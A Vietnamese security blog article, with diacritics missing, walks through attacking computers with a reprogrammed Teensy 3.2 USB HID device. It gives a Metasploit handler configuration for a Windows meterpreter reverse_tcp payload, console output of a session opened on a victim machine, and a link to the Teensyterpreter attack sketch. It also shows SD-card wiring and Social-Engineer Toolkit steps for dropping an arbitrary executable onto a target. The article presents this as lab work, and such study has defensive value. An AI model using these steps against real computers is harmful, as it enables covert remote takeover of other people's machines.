Tn cng my tnh s dng Teensy HID - P1

visudo.info/tan-cong-may-tinh-su-dung-teensy-hid-p1/

10/7/2016
K thut tn cng my tnh s dng thit b HID xut hin trong nhiu nm tr li y, thit b HID l mt phn
lp ca tiu chun USB - thng c ng dng trong kh nhiu cc thit b ngoi vi vi hnh dng, kch thc v
chc nng khc nhau. Trong bi vit ny, ti s tin hnh th nghim cc lab s dng thit b Teensy HID phin bn
phn cng 3.2 khai thc, chim quyn my tnh v mt s hnh thc tn cng a dng khc.

HID (Human Interface Device): l mt phn lp (class) trong tiu chun USB. Mt thit b HID c th
c lp trnh nh ngha li chc nng ca n. Thit b HID c th l mt bn phm USB, chut
USB, thit b chi game cm tay, thit b lu tr d liu, ...

Cc cuc tn cng Social Engineering

Qu trnh tm kim v ng dng nhng im yu bo mt vo khai thc, nh cp d liu l khng ngng. S pht
trin ca mt gii php, xu hng cng ngh lun gn lin nhng nguy c m tin tc c th s dng chng li
nhng ngi dng bt cn. Qu trnh pht trin cc phn cng c hi cng khng ngoi l, v ngy cng mang
tnh cht tinh vi hn, kh nng tn cng t cc thit b phn cng ngy cng m rng.
Thc t chng minh cc iu trn l ng, ti s thc hin tng hp mt s tnh hung tn cng c in n cc
phng thc mi nht m nn nhn chnh l ngi dng cui hoc h thng CNTT c chnh sch bo mt km.

Thit b lu tr USB cha m c

Thit b lu tr USB tr thnh mt tiu chun s dng rng ri trong thi i k thut s. Cc nh sn xut thit
b lu tr USB phi tun th cc ch dn trong "phn lp thit b lu tr" (USB mass-storage device class) thng
bo n h iu hnh v thng tin phn cng, gip nhanh chng xc nh v kt ni vi nhau thng qua driver. C
nhiu tiu chun c s dng rng ri trong phn lp ny bao gm: USB lu tr, th nh, thit b c th, my
nh k thut s, my chi nhc MP3/MP4, khung nh k thut s, in thoi thng minh. Phng php tn cng
ch yu trn nhng thit b ny l c th cha nhng m c nhm li dng s bt cn ca ngi dng kch
hot, y c xem l dng tn cng ph bin v d dng thc hin ti thi im USB mi ph bin.
T phin bn h iu hnh Windows 95, tnh nng Autorun (s dng autorun.inf) l mt trong nhng im ng ch
cc tin tc d dng trin khai m c m khng cn phi kch hot th cng. Nhng phin bn h iu hnh v
sau, Microsoft lun ci tin cc tnh nng nhm bo m ngi dng c an ton trc cc thit b ngoi vi:
Windows XP chn thc thi autorun.info t USB, nhng vn cho php CD/DVD kch hot tnh nng
autorun.inf. y l thi im ra i ca thit b USB U3, c bn y l mt thit b USB thng thng c
tch hp chc nng to phn vng m rng vi nh dng thit b l CD/DVD nhm vt qua c ch kim
sot ca h iu hnh.
Vista chn autorun.inf trn mi thit b ngoi vi v s ra i ca c ch bo v UAC (User Account Control) .
C ch bo v UAC vn c s dng cho nhng phin bn Windows 7, Windows 8 v Windows 10 nhm
tng kh nng kim sot vic thc thi m c t ng.
Hnh thc tn cng s dng HID ngy nay c th vt qua hu ht cc c ch kim sot an ninh mc
nh ca h iu hnh.

1/14

Thit b lu tr USB U3
USB U3, c bn y l mt thit b USB thng thng c tch hp chc nng to phn vng m
rng vi nh dng thit b l CD/DVD

S ra i ca thit b USB U3 l mt nhnh pht trin ca k thut vt c ch kim sot USB ca h iu hnh
Windows XP. USB U3 li dng chnh sch Autorun ch c cho php trn CD/DVD, cc tin tc p dng tnh
nng nhm lu tr v thc thi m c t ng trn XP.

Thit b HID - k thut tn cng a hnh

Nhm vt qua cc c ch kim sot ca h iu hnh ngy nay, phng n tn cng s dng thit b HID l mt
la chn hon ho. Bng cch lp trnh li vi iu khin ca thit b HID, tin tc c th gi lp cc hnh vi ca bn
phm, chut gi cc thng tin d liu mong mun n my tnh/ thit b kt ni nhm thc thi m c chim
quyn iu khin.
Do c tnh linh ng v c th nh ngha li vi x l, HID c th n mnh di nhiu hnh dng v chc nng khc
nhau nh: b sc ngun, bn phm, qut USB, n USB, u c th nh, ng h,...
Trn th trng hin nay c kh nhiu vi x l, mch tch hp, thit b h tr HID v ngi dng c th nhanh chng
thay i cu trc firmware ca n thng qua ngn ng lp trnh. Mt s tiu biu nh Arduino, Raspberry Pi, Teensy,
USB Rubber Ducky Deluxe,...

2/14

Hnh 1: Cc thit b h tr HID

Thit b Teensy HID

Teensy l mt mch tch hp s dng vi x l trn nn tng USB, thit k vi kch thc nh v c th pht trin
m rng thnh nhiu tnh nng khc nhau. Tt c qu trnh bin dch, np chip v thc thi m u thng qua kt ni
USB. Gi ca mch Teensy 3.2 l khong 20 USD v bn c th mua trc tuyn ti PJRC Store.

Hnh 2: Thit b Teensy 3.2

Arduino IDE, Teensyduino

tin hnh np cc m ngun vo thit b, bn cn phi ci t Arduino IDE v th vin Teensyduino;
Ti Arduino IDE: https://www.arduino.cc/en/Main/Software
Ti Teensyduino: https://www.pjrc.com/teensy/td_download.html

3/14

Hnh 3: Giao din Arduino IDE v Teensyduino

Sau khi tin hnh ci t thnh cng, bn c th tin hnh lp trnh v np chng trnh vo thit b qua giao din
Arduino IDE. Cn ch chn ng phin bn phn cng m bn s dng np chng trnh.

Hnh 4: Thit lp mi trng lp trnh Teensy 3.2

4/14

Teensy USB Tn cng a nn tng

Teensy c th ng vai tr l mt thit b m c (lu tr cc m dropper trong chnh thit b Teensy), hoc c th
kt hp vi th nh SD m rng vng lu tr d liu (lu tr cc CVE exploit, 0-day, malware,...). Khi dropper
c to trn my nn nhn, n s tin hnh nhn cc m khai thc, backdoor,... t my ch tin tc.

Tn cng 1: Teensy USB + Metasploit

y l k thut tn cng n gin nht kim sot my nn nhn di 30 giy.
Bc 1: Kch hot Metasploit ti my ch tin tc
To tp tin payload_handler.rc vi ni dung nh sau:
root@kali:~# cat payload_handler.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j
Khi to my ch tin tc s dng lnh msfconsole:
root@kali:~# msfconsole -r payload_handler.rc
....
[*] Processing payload_handler.rc for ERB directives.
resource (payload_handler.rc)> use multi/handler
resource (payload_handler.rc)> set payload windows/meterpreter/reverse_tcp

5/14

payload => windows/meterpreter/reverse_tcp

resource (payload_handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (payload_handler.rc)> set LPORT 4444
LPORT => 4444
resource (payload_handler.rc)> set ExitOnSession false
ExitOnSession => false
resource (payload_handler.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (payload_handler.rc)> exploit -j
[*] Exploit running as background job.
Bc 2: Np chng trnh Teensy
C nhiu platform cung cp m chng trnh phc v to kt ni t my nn nhn n my ch tin tc nh: Social
Engineering Toolkit, hid-backdoor-peensy,... Trong v d ny, ti s s dng m khai thc Teensyterpreter vi cc
tnh nng c bn nht c th nhanh chng hiu r tnh nng ca Teensy.
Ti m ngun Teensyterpreter ti:
https://raw.githubusercontent.com/KernelEquinox/Teensyterpreter/master/Teensyterpreter.ino
Thc hin m tp tin Teensyterpreter.ino trong Arduino IDE v cn iu chnh cu hnh kt ni n IP, Port my ch
Metasploit.

Hnh 5: Thit lp a ch IP, cng kt ni n my ch tin tc

6/14

Trc khi thc hin bin dch v np chip, cn ch thit lp thit b Teensy l " Keyboard + Mouse + Joystick".

Hnh 6: Thit lp loi thit b USB

Thc hin bin dch v np chip thng qua nt Verify v Upload.

Hnh 7: Bin dch Teensyterpreter

7/14

Sau khi np chng trnh bn c th thc hin kim tra kt ni ti Metasploit.

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (958029 bytes) to 14.187.167.126
[*] Meterpreter session 1 opened (192.168.207.141:4444 -> 14.187.167.126:11167) at
2016-07-10 01:34:04 -0400
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type
Information
-- -------------1
meterpreter x86/win32 VICTIM\victim @ VICTIM
14.187.167.126:11167 (192.168.1.64)

Connection
---------192.168.207.141:4444 ->

msf exploit(handler) >

Hnh 8: Kt ni t my nn nhn n Metasploit

Tn cng 2: Teensy USB + Micro SD card

Nhm khc phc nhng hn ch khi tn cng my tnh trong mi trng khng c kt ni internet, hoc cn sao
chp d liu trn mt my tnh nn nhn, ti thc hin lu tr m c vo th nh MicroSD v np li chng trnh
cho Teensy.
c th kt ni thm thit b MicroSD vo Teensy, ti cn thm mt module tch hp "SD Adaptor". Bn c th
mua mch ny ti http://www.pjrc.com/store/sd_adaptor.html, y module tng thch vi Teensy USB v c kch
thc nh, ph hp cho vic ngy trang thit b.

8/14

Hnh 9: Mch tch hp SD Adaptor

Tuy nhin, bn cng c th mua mt s loi adaptor khc t th trng, bn cn c k cc ch dn c th kt ni
phn cng v np chng trnh cho cc chn ph hp.

Hnh 10: Mch tch hp SD Adaptor dnh cho Arduino

9/14

Hnh 11: Kt ni Teensy USB v SD adaptor

Kt ni phn cng
thc hin kt ni cc thit b phn cng, ti s dng mt s dy ni loi u ci-ci 10cm, v hn cc chn c
vo mch Teensy. S kt ni nh sau:
SD Adaptor ----------- Teensy
+5V (VCC) ni vo 3.3V (100 mA max)
Ground (GND) ni vo GND
MOSI ni vo chn 11, DOUT
MISO ni vo chn 12, DIN
SCLK (SCK) ni vo chn 13, SCK
SS (CS) ni vo chn 10, CS

Np chng trnh c th nh
Ti tin hnh np chng trnh kim tra kt ni n th nh v kim tra d liu ti cng COM.

10/14

Hnh 12: M ngun SD CardInfo

Cn iu chnh chipSelect =10 tng ng vi cng CS/SS theo kt ni vt l.
// change this to match your SD shield or module;
// Arduino Ethernet shield: pin 4
// Adafruit SD shields and modules: pin 10
// Sparkfun SD shield: pin 8
const int chipSelect = 10;

11/14

Hnh 13: M ngun SD CardInfo

Hnh 14: M ngun SD CardInfo

12/14

Trin khai m c
Ti s dng chng trnh Social-Engineer Toolkit (SET) ti Kali to m c v np chng trnh cho Teensy.

Hnh 15: Lung tn cng s dng Teensy + SD Card

root@kali:~# setoolkit
1) Social-Engineering Attacks
6) Arduino-Based Attack Vector
8) SDCard 2 Teensy Attack (Deploy Any EXE)
Ti chng trnh payload.exe to sn vo chuyn thnh .txt ti ng dn /usr/share/set/. Sao chp
converts.txt vo th nh v np teensy.pde vo Teensy.

Tham kho
1. How AutoRun Malware Became a Problem on Windows, and How It Was (Mostly) Fixed
2. Dont Panic, But All USB Devices Have a Massive Security Problem
3. HTG Explains: What Is Juice Jacking and How Worried Should You Be?
4. https://www.pjrc.com/teensy/
5. http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
6. http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
7. https://www.offensive-security.com/offsec/advanced-teensy-penetration-testing-payloads/
8. https://github.com/offensive-security/hid-backdoor-peensy
9. https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/teensy/peensy.pde
10. https://github.com/matterpreter/penteensy

13/14

11. https://github.com/samratashok/nishang
12. http://www.linux-usb.org/usb.ids
13. https://jumpespjump.blogspot.com/2013/09/making-pc-mouse-hw-trojan.html
Bn quyn thuc v Visudo Blog 2016

14/14